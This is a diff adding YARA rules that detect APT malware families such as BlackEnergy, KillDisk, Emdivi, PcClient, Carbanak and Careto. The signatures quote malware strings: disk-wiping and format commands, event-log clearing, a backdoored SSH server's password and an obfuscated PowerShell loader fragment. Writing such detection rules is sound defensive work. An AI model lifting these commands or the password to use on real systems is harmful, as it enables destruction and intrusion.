+++ remnux-rules-0.0.4/yara/malware/APT_APT17.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,29 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+*/
+
+rule APT17_Sample_FXSST_DLL {
+	meta:
+		description = "Detects Samples related to APT17 activity - file FXSST.DLL"
+		author = "Florian Roth"
+		reference = "https://goo.gl/ZiJyQv"
+		date = "2015-05-14"
+		hash = "52f1add5ad28dc30f68afda5d41b354533d8bce3"
+	strings:
+		$x1 = "Microsoft? Windows? Operating System" fullword wide
+		$x2 = "fxsst.dll" fullword ascii
+		
+		$y1 = "DllRegisterServer" fullword ascii
+		$y2 = ".cSV" fullword ascii
+		
+		$s1 = "GetLastActivePopup"
+		$s2 = "Sleep"
+		$s3 = "GetModuleFileName"
+		$s4 = "VirtualProtect"
+		$s5 = "HeapAlloc"
+		$s6 = "GetProcessHeap"
+		$s7 = "GetCommandLine"
+	condition:
+		uint16(0) == 0x5a4d and filesize < 800KB and 
+			( 1 of ($x*) or all of ($y*) ) and all of ($s*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_backspace.yar remnux-rules-0.0.4/yara/malware/APT_backspace.yar
--- remnux-rules-0.0.3/yara/malware/APT_backspace.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_backspace.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,17 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+*/
+
+rule apt_backspace{
+	meta:
+		description = "Detects APT backspace"
+		author = "Bit Byte Bitten"
+		date = "2015-05-14"
+		hash = "6cbfeb7526de65eb2e3c848acac05da1e885636d17c1c45c62ad37e44cd84f99"
+	strings:
+		$s1 = "!! Use Splice Socket !!"
+		$s2 = "User-Agent: SJZJ (compatible; MSIE 6.0; Win32)"
+		$s3 = "g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d"
+	condition:
+		uint16(0) == 0x5a4d and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Bestia.yar remnux-rules-0.0.4/yara/malware/APT_Bestia.yar
--- remnux-rules-0.0.3/yara/malware/APT_Bestia.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Bestia.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,37 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+rule APT_bestia
+{
+meta:
+    author = "Adam Ziaja <adam@adamziaja.com> http://adamziaja.com"
+    date = "2014-03-19"
+    description = "Bestia.3.02.012.07 malware used in APT attacks on Polish government"
+    references = "http://zaufanatrzeciastrona.pl/post/ukierunkowany-atak-na-pracownikow-polskich-samorzadow/" /* PL */
+    hash0 = "9bb03bb5af40d1202378f95a6485fba8"
+    hash1 = "7d9a806e0da0b869b10870dd6c7692c5"
+    maltype = "apt"
+    filetype = "exe"
+strings:
+    /* generated with https://github.com/Xen0ph0n/YaraGenerator */
+    $string0 = "u4(UeK"
+    $string1 = "nMiq/'p"
+    $string2 = "_9pJMf"
+    $string3 = "ICMP.DLL"
+    $string4 = "EG}QAp"
+    $string5 = "tsjWj:U"
+    $string6 = "FileVersion" wide
+    $string7 = "O2nQpp"
+    $string8 = "2}W8we"
+    $string9 = "ILqkC:l"
+    $string10 = "f1yzMk"
+    $string11 = "AutoIt v3 Script: 3, 3, 8, 1" wide
+    $string12 = "wj<1uH"
+    $string13 = "6fL-uD"
+    $string14 = "B9Iavo<"
+    $string15 = "rUS)sO"
+    $string16 = "FJH{_/f"
+    $string17 = "3e 03V"
+condition:
+    17 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Blackenergy.yar remnux-rules-0.0.4/yara/malware/APT_Blackenergy.yar
--- remnux-rules-0.0.3/yara/malware/APT_Blackenergy.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Blackenergy.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,176 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2015-02-19
+	Identifier: BlackEnergy Malware
+*/
+
+rule BlackEnergy_BE_2 {
+   meta:
+      description = "Detects BlackEnergy 2 Malware"
+      author = "Florian Roth"
+      reference = "http://goo.gl/DThzLz"
+      date = "2015/02/19"
+      hash = "983cfcf3aaaeff1ad82eb70f77088ad6ccedee77"
+   strings:
+      $s0 = "<description> Windows system utility service  </description>" fullword ascii
+      $s1 = "WindowsSysUtility - Unicode" fullword wide
+      $s2 = "msiexec.exe" fullword wide
+      $s3 = "WinHelpW" fullword ascii
+      $s4 = "ReadProcessMemory" fullword ascii
+   condition:
+      uint16(0) == 0x5a4d and filesize < 250KB and all of ($s*)
+}
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-01-03
+	Identifier: BlackEnergy Malware
+*/
+
+rule BlackEnergy_VBS_Agent {
+	meta:
+		description = "Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs"
+		author = "Florian Roth"
+		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+		date = "2016-01-03"
+		hash = "b90f268b5e7f70af1687d9825c09df15908ad3a6978b328dc88f96143a64af0f"
+	strings:
+		$s0 = "WshShell.Run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, false" fullword ascii
+		$s1 = "WshShell.CurrentDirectory = \"C:\\WINDOWS\\TEMP\\Dropbear\\\"" fullword ascii
+		$s2 = "Set WshShell = CreateObject(\"WScript.Shell\")" fullword ascii /* Goodware String - occured 1 times */
+	condition:
+		filesize < 1KB and 2 of them
+}
+
+rule DropBear_SSH_Server {
+	meta:
+		description = "Detects DropBear SSH Server (not a threat but used to maintain access)"
+		author = "Florian Roth"
+		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+		date = "2016-01-03"
+		score = 50
+		hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
+	strings:
+		$s1 = "Dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.html" fullword ascii
+		$s2 = "Badly formatted command= authorized_keys option" fullword ascii
+		$s3 = "This Dropbear program does not support '%s' %s algorithm" fullword ascii
+		$s4 = "/etc/dropbear/dropbear_dss_host_key" fullword ascii
+		$s5 = "/etc/dropbear/dropbear_rsa_host_key" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1000KB and 2 of them
+}
+
+rule BlackEnergy_BackdoorPass_DropBear_SSH {
+	meta:
+		description = "Detects the password of the backdoored DropBear SSH Server - BlackEnergy"
+		author = "Florian Roth"
+		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+		date = "2016-01-03"
+		hash = "0969daac4adc84ab7b50d4f9ffb16c4e1a07c6dbfc968bd6649497c794a161cd"
+	strings:
+		$s1 = "passDs5Bu9Te7" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and $s1
+}
+
+/* Super Rules ------------------------------------------------------------- */
+
+rule BlackEnergy_KillDisk_1 {
+	meta:
+		description = "Detects KillDisk malware from BlackEnergy"
+		author = "Florian Roth"
+		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+		date = "2016-01-03"
+		score = 80
+		super_rule = 1
+		hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
+		hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
+		hash3 = "c7536ab90621311b526aefd56003ef8e1166168f038307ae960346ce8f75203d"
+		hash4 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
+	strings:
+		$s0 = "system32\\cmd.exe" fullword ascii
+		$s1 = "system32\\icacls.exe" fullword wide
+		$s2 = "/c del /F /S /Q %c:\\*.*" fullword ascii
+		$s3 = "shutdown /r /t %d" fullword ascii
+		$s4 = "/C /Q /grant " fullword wide
+		$s5 = "%08X.tmp" fullword ascii
+		$s6 = "/c format %c: /Y /X /FS:NTFS" fullword ascii
+		$s7 = "/c format %c: /Y /Q" fullword ascii
+		$s8 = "taskhost.exe" fullword wide /* Goodware String - occured 1 times */
+		$s9 = "shutdown.exe" fullword wide /* Goodware String - occured 1 times */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 500KB and 8 of them
+}
+
+rule BlackEnergy_KillDisk_2 {
+	meta:
+		description = "Detects KillDisk malware from BlackEnergy"
+		author = "Florian Roth"
+		reference = "http://feedproxy.google.com/~r/eset/blog/~3/BXJbnGSvEFc/"
+		date = "2016-01-03"
+		score = 80
+		super_rule = 1
+		hash1 = "11b7b8a7965b52ebb213b023b6772dd2c76c66893fc96a18a9a33c8cf125af80"
+		hash2 = "5d2b1abc7c35de73375dd54a4ec5f0b060ca80a1831dac46ad411b4fe4eac4c6"
+		hash3 = "f52869474834be5a6b5df7f8f0c46cbc7e9b22fa5cb30bee0f363ec6eb056b95"
+	strings:
+		$s0 = "%c:\\~tmp%08X.tmp" fullword ascii
+		$s1 = "%s%08X.tmp" fullword ascii
+		$s2 = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" fullword wide
+		$s3 = "%ls_%ls_%ls_%d.~tmp" fullword wide
+	condition:
+		uint16(0) == 0x5a4d and filesize < 500KB and 3 of them
+}
+
+rule BlackEnergy_Driver_USBMDM {
+	meta:
+		description = "Auto-generated rule - from files 7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094, b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a, edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"
+		author = "Florian Roth"
+		reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
+		date = "2016-01-04"
+		super_rule = 1
+		hash1 = "7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094"
+		hash2 = "b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a"
+		hash3 = "edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"
+		hash4 = "ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc"
+		hash5 = "7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291"
+		hash6 = "405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5"
+		hash7 = "244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5"
+		hash8 = "edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf"
+	strings:
+		$s1 = "USB MDM Driver" fullword wide
+		$s2 = "KdDebuggerNotPresent" fullword ascii /* Goodware String - occured 50 times */
+		$s3 = "KdDebuggerEnabled" fullword ascii /* Goodware String - occured 69 times */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 180KB and all of them
+}
+
+rule BlackEnergy_Driver_AMDIDE {
+	meta:
+		description = "Auto-generated rule - from files 32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614, 3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2, 90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c, 97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1"
+		author = "Florian Roth"
+		reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
+		date = "2016-01-04"
+		super_rule = 1
+		hash1 = "32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614"
+		hash2 = "3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2"
+		hash3 = "90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c"
+		hash4 = "97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1"
+		hash5 = "5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc"
+		hash6 = "cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988"
+		hash7 = "1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68"
+	strings:
+		$s1 = " AMD IDE driver" fullword wide
+		$s2 = "SessionEnv" fullword wide
+		$s3 = "\\DosDevices\\{C9059FFF-1C49-4445-83E8-" wide
+		$s4 = "\\Device\\{C9059FFF-1C49-4445-83E8-" wide
+	condition:
+		uint16(0) == 0x5a4d and filesize < 150KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_bluetermite_emdivi.yar remnux-rules-0.0.4/yara/malware/APT_bluetermite_emdivi.yar
--- remnux-rules-0.0.3/yara/malware/APT_bluetermite_emdivi.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_bluetermite_emdivi.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,133 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule Emdivi_SFX {
+	meta:
+		description = "Detects Emdivi malware in SFX Archive"
+		author = "Florian Roth @Cyber0ps"
+		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+		date = "2015-08-20"
+		score = 70
+		hash1 = "7a3c81b2b3c14b9cd913692347019887b607c54152b348d6d3ccd3ecfd406196"
+		hash2 = "8c3df4e4549db3ce57fc1f7b1b2dfeedb7ba079f654861ca0b608cbfa1df0f6b"
+	strings:
+		$x1 = "Setup=unsecess.exe" fullword ascii
+		$x2 = "Setup=leassnp.exe" fullword ascii
+
+		$s1 = "&Enter password for the encrypted file:" fullword wide
+		$s2 = ";The comment below contains SFX script commands" fullword ascii
+		$s3 = "Path=%temp%" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 740KB and (1 of ($x*) and all of ($s*))
+}
+
+/* Super Rules ------------------------------------------------------------- */
+
+rule Emdivi_Gen1 {
+	meta:
+		description = "Detects Emdivi Malware"
+		author = "Florian Roth @Cyber0ps"
+		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+		date = "2015-08-20"
+		score = 80
+		super_rule = 1
+		hash1 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
+		hash2 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
+		hash3 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
+		hash4 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
+	strings:
+		$x1 = "wmic nteventlog where filename=\"SecEvent\" call cleareventlog" fullword wide
+		$s0 = "del %Temp%\\*.exe %Temp%\\*.dll %Temp%\\*.bat %Temp%\\*.ps1 %Temp%\\*.cmd /f /q" fullword wide
+		$x3 = "userControl-v80.exe" fullword ascii
+
+		$s1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword wide
+		$s2 = "http://www.msftncsi.com" fullword wide
+		$s3 = "net use | find /i \"c$\"" fullword wide
+		$s4 = " /del /y & " fullword wide
+		$s5 = "\\auto.cfg" fullword wide
+		$s6 = "/ncsi.txt" fullword wide
+		$s7 = "Dcmd /c" fullword wide
+		$s8 = "/PROXY" fullword wide
+	condition:
+		uint16(0) == 0x5a4d and filesize < 800KB and all of them
+}
+
+rule Emdivi_Gen2 {
+	meta:
+		description = "Detects Emdivi Malware"
+		author = "Florian Roth @Cyber0ps"
+		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+		date = "2015-08-20"
+		super_rule = 1
+		score = 80
+		hash1 = "9a351885bf5f6fec466f30021088504d96e9db10309622ed198184294717add1"
+		hash2 = "a5be7cb1f37030c9f9211c71e0fbe01dae19ff0e6560c5aab393621f18a7d012"
+		hash3 = "9183abb9b639699cd2ad28d375febe1f34c14679b7638d1a79edb49d920524a4"
+	strings:
+		$s1 = "%TEMP%\\IELogs\\" fullword ascii
+		$s2 = "MSPUB.EXE" fullword ascii
+		$s3 = "%temp%\\" fullword ascii
+		$s4 = "\\NOTEPAD.EXE" fullword ascii
+		$s5 = "%4d-%02d-%02d %02d:%02d:%02d " fullword ascii
+		$s6 = "INTERNET_OPEN_TYPE_PRECONFIG" fullword ascii
+		$s7 = "%4d%02d%02d%02d%02d%02d" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 1300KB and 6 of them
+}
+
+rule Emdivi_Gen3 {
+	meta:
+		description = "Detects Emdivi Malware"
+		author = "Florian Roth @Cyber0ps"
+		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+		date = "2015-08-20"
+		super_rule = 1
+		score = 80
+		hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
+		hash2 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
+	strings:
+		$x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword ascii
+
+		$s2 = "\\Mozilla\\Firefox\\Profiles\\" fullword ascii
+		$s4 = "\\auto.cfg" fullword ascii
+		$s5 = "/ncsi.txt" fullword ascii
+		$s6 = "/en-us/default.aspx" fullword ascii
+		$s7 = "cmd /c" fullword ascii	
+		$s9 = "APPDATA" fullword ascii /* Goodware String - occured 25 times */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 850KB and 
+		(
+			( $x1 and 1 of ($s*) ) or 
+			( 4 of ($s*) )
+		)
+}
+
+rule Emdivi_Gen4 {
+	meta:
+		description = "Detects Emdivi Malware"
+		author = "Florian Roth @Cyber0ps"
+		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+		date = "2015-08-20"
+		super_rule = 1
+		score = 80
+		hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
+		hash2 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
+		hash3 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
+		hash4 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
+		hash5 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
+		hash6 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
+	strings:
+		$s1 = ".http_port\", " fullword wide
+		$s2 = "UserAgent: " fullword ascii
+		$s3 = "AUTH FAILED" fullword ascii
+		$s4 = "INVALID FILE PATH" fullword ascii
+		$s5 = ".autoconfig_url\", \"" fullword wide
+		$s6 = "FAILED TO WRITE FILE" fullword ascii
+		$s7 = ".proxy" fullword wide
+		$s8 = "AuthType: " fullword ascii
+		$s9 = ".no_proxies_on\", \"" fullword wide
+	condition:
+		uint16(0) == 0x5a4d and filesize < 853KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_c16.yar remnux-rules-0.0.4/yara/malware/APT_c16.yar
--- remnux-rules-0.0.3/yara/malware/APT_c16.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_c16.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,107 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+*/
+
+import "pe"
+
+rule apt_c16_win_memory_pcclient 
+{
+  meta:
+    author = "@dragonthreatlab"
+    md5 = "ec532bbe9d0882d403473102e9724557"
+    description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
+    date        = "2015/01/11" 
+    reference   = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
+  strings:
+    $str1 = "Kill You" ascii
+    $str2 = "%4d-%02d-%02d %02d:%02d:%02d" ascii
+    $str3 = "%4.2f  KB" ascii
+    $encodefunc = {8A 08 32 CA 02 CA 88 08 40 4E 75 F4}  
+  condition:
+    all of them
+}
+
+rule apt_c16_win_disk_pcclient 
+{
+  meta:
+    author = "@dragonthreatlab"
+    md5 = "55f84d88d84c221437cd23cdbc541d2e"
+    description = "Encoded version of pcclient found on disk"
+    date        = "2015/01/11" 
+    reference   = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
+  strings:
+    $header = {51 5C 96 06 03 06 06 06 0A 06 06 06 FF FF 06 06 BE 06 06 06 06 06 06 06 46 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 EE 06 06 06 10 1F BC 10 06 BA 0D D1 25 BE 05 52 D1 25 5A 6E 6D 73 26 76 74 6F 67 74 65 71 26 63 65 70 70 6F 7A 26 64 69 26 74 79 70 26 6D 70 26 4A 4F 53 26 71 6F 6A 69 30 11 11 0C 2A 06 06 06 06 06 06 06 73 43 96 1B 37 24 00 4E 37 24 00 4E 37 24 00 4E BA 40 F6 4E 39 24 00 4E 5E 41 FA 4E 33 24 00 4E 5E 41 FC 4E 39 24 00 4E 37 24 FF 4E 0D 24 00 4E FA 31 A3 4E 40 24 00 4E DF 41 F9 4E 36 24 00 4E F6 2A FE 4E 38 24 00 4E DF 41 FC 4E 38 24 00 4E 54 6D 63 6E 37 24 00 4E 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 06 56 49 06 06 52 05 09 06 5D 87 8C 5A 06 06 06 06 06 06 06 06 E6 06 10 25 0B 05 08 06 06 1C 06 06 06 1A 06 06 06 06 06 06 E5 27 06 06 06 16 06 06 06 36 06 06 06 06 06 16 06 16 06 06 06 04 06 06 0A 06 06 06 06 06 06 06 0A 06 06 06 06 06 06 06 06 76 06 06 06 0A 06 06 06 06 06 06 04 06 06 06 06 06 16 06 06 16 06 06}
+  condition:
+    $header at 0
+}
+
+rule apt_c16_win32_dropper 
+{
+  meta:
+    author = "@dragonthreatlab"
+    md5 = "ad17eff26994df824be36db246c8fb6a"
+    description = "APT malware used to drop PcClient RAT"
+    date        = "2015/01/11" 
+    reference   = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
+  strings:
+    $mz = {4D 5A}
+    $str1 = "clbcaiq.dll" ascii
+    $str2 = "profapi_104" ascii
+    $str3 = "/ShowWU" ascii
+    $str4 = "Software\\Microsoft\\Windows\\CurrentVersion\\" ascii
+    $str5 = {8A 08 2A CA 32 CA 88 08 40 4E 75 F4 5E}
+  condition:
+    $mz at 0 and all of ($str*)
+}
+
+rule apt_c16_win_swisyn 
+{
+  meta:
+    author = "@dragonthreatlab"
+    md5 = "a6a18c846e5179259eba9de238f67e41"
+    description = "File matching the md5 above tends to only live in memory, hence the lack of MZ header check."
+    date        = "2015/01/11" 
+    reference   = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
+  strings:
+    $mz = {4D 5A}
+    $str1 = "/ShowWU" ascii
+    $str2 = "IsWow64Process"
+    $str3 = "regsvr32 "
+    $str4 = {8A 11 2A 55 FC 8B 45 08 88 10 8B 4D 08 8A 11 32 55 FC 8B 45 08 88 10}
+  condition:
+    $mz at 0 and all of ($str*)
+}
+
+rule apt_c16_win_wateringhole 
+{
+  meta:
+    author = "@dragonthreatlab"
+    description = "Detects code from APT wateringhole"
+    date        = "2015/01/11" 
+    reference   = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
+  strings:
+    $str1 = "function runmumaa()"
+    $str2 = "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("
+    $str3 = "function MoSaklgEs7(k)"
+  condition:
+    any of ($str*)
+}
+
+rule apt_c16_win64_dropper
+{
+    meta:
+        author      = "@dragonthreatlab"
+        date        = "2015/01/11" 
+        description = "APT malware used to drop PcClient RAT"
+        reference   = "http://blog.dragonthreatlabs.com/2015/01/dtl-12012015-01-hong-kong-swc-attack.html"
+
+    strings:
+        $mz = { 4D 5A }
+        $str1 = "clbcaiq.dll" ascii
+        $str2 = "profapi_104" ascii
+        $str3 = "\\Microsoft\\wuauclt\\wuauclt.dat" ascii
+        $str4 = { 0F B6 0A 48 FF C2 80 E9 03 80 F1 03 49 FF C8 88 4A FF 75 EC }
+
+    condition:
+        $mz at 0 and all of ($str*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Carbanak2.yar remnux-rules-0.0.4/yara/malware/APT_Carbanak2.yar
--- remnux-rules-0.0.3/yara/malware/APT_Carbanak2.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Carbanak2.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,62 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2015-09-03
+	Identifier: Carbanak Rules
+*/
+
+/* Rule Set ----------------------------------------------------------------- */
+
+rule Carbanak_0915_1 {
+	meta:
+		description = "Carbanak Malware"
+		author = "Florian Roth"
+		reference = "https://www.csis.dk/en/csis/blog/4710/"
+		date = "2015-09-03"
+		score = 70
+	strings:
+		$s1 = "evict1.pdb" fullword ascii
+		$s2 = "http://testing.corp 0" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 100KB and 1 of them
+}
+
+rule Carbanak_0915_2 {
+	meta:
+		description = "Carbanak Malware"
+		author = "Florian Roth"
+		reference = "https://www.csis.dk/en/csis/blog/4710/"
+		date = "2015-09-03"
+		score = 70
+	strings:
+		$x1 = "8Rkzy.exe" fullword wide
+
+		$s1 = "Export Template" fullword wide
+		$s2 = "Session folder with name '%s' already exists." fullword ascii
+		$s3 = "Show Unconnected Endpoints (Ctrl+U)" fullword ascii
+		$s4 = "Close All Documents" fullword wide
+		$s5 = "Add &Resource" fullword ascii
+		$s6 = "PROCEXPLORER" fullword wide /* Goodware String - occured 1 times */
+		$s7 = "AssocQueryKeyA" fullword ascii /* Goodware String - occured 4 times */
+	condition:
+		uint16(0) == 0x5a4d and filesize < 500KB and ( $x1 or all of ($s*) )
+}
+
+rule Carbanak_0915_3 {
+	meta:
+		description = "Carbanak Malware"
+		author = "Florian Roth"
+		reference = "https://www.csis.dk/en/csis/blog/4710/"
+		date = "2015-09-03"
+		score = 70
+	strings:
+		$s1 = "wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww" fullword ascii
+		$s2 = "SHInvokePrinterCommandA" fullword ascii
+		$s3 = "Ycwxnkaj" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 700KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Careto.yar remnux-rules-0.0.4/yara/malware/APT_Careto.yar
--- remnux-rules-0.0.3/yara/malware/APT_Careto.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Careto.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,62 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+*/
+
+import "pe"
+
+rule Careto_SGH {
+	meta:
+		author = "AlienVault (Alberto Ortega)"
+		description = "TheMask / Careto SGH component signature"
+		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+		date = "2014/02/11"
+	strings:
+		$m1 = "PGPsdkDriver" ascii wide fullword
+		$m2 = "jpeg1x32" ascii wide fullword
+		$m3 = "SkypeIE6Plugin" ascii wide fullword
+		$m4 = "CDllUninstall" ascii wide fullword
+	condition:
+		2 of them
+}
+
+rule Careto_OSX_SBD {
+	meta:
+		author = "AlienVault (Alberto Ortega)"
+		description = "TheMask / Careto OSX component signature"
+		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+		date = "2014/02/11"
+	strings:
+		/* XORed "/dev/null strdup() setuid(geteuid())" */
+		$1 = {FF 16 64 0A 7E 1A 63 4D 21 4D 3E 1E 60 0F 7C 1A 65 0F 74 0B 3E 1C 7F 12}
+	condition:
+		all of them
+}
+
+rule Careto_CnC {
+	meta:
+		author = "AlienVault (Alberto Ortega)"
+		description = "TheMask / Careto CnC communication signature"
